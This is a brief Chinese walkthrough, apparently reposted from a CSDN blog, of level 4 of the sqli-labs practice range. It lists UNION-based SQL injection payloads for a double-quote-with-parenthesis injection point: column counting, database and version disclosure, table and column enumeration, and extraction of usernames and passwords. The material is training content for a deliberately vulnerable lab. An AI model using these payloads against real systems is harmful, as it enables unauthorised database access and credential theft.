SQL注入sqli_labs靶场第四题
根据报错信息得到注入点是双引号带括号注入
联合查询:
猜解列名
?id=1") order by 3--+
判断回显点
?id=-1") union select 1,2,3--+
爆库、版本号、权限
?id=-1") union select 1,database(),version()--+
?id=-1") union select 1,2,user()--+
爆表、爆列
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
爆账号密码
?id=-1") union select 1,2,(select group_concat(username,password))from users
原文地址:https://blog.csdn.net/2301_79355407/article/details/137613780
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!